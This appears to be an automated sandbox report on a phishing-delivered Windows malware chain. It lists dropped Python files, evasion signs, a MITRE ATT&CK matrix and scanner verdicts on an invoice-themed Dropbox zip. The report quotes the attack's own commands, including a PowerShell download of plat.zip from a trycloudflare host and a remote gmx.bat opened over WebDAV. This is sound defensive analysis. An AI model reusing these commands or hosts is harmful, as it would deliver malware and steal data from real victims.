Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Launcher\pyw.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Launcher\py.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\select.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pydJump to dropped file
Source: C:\Windows\System32\svchost.exe TID: 4432Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep count: 2316 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3948Thread sleep count: 7513 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 1220 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 8597 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\GAOBCVIQIJ.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\plat.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }"
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile opened: \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts2
PowerShell
1
Scripting
11
Process Injection
11
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
31
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?rlkey=jd0edpow40fhsvvb7o73yg1xi&st=x3gp2xzd&dl=00%Avira URL Cloudsafe
https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?rlkey=jd0edpow40fhsvvb7o73yg1xi&st=x3gp2xzd&dl=04%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\Downloads\Python\Launcher\py.exe0%ReversingLabs
C:\Users\user\Downloads\Python\Launcher\py.exe0%VirustotalBrowse
C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dll0%ReversingLabs
C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dll0%VirustotalBrowse
C:\Users\user\Downloads\Python\Launcher\pyw.exe0%ReversingLabs
C:\Users\user\Downloads\Python\Launcher\pyw.exe0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pyd0%ReversingLabs
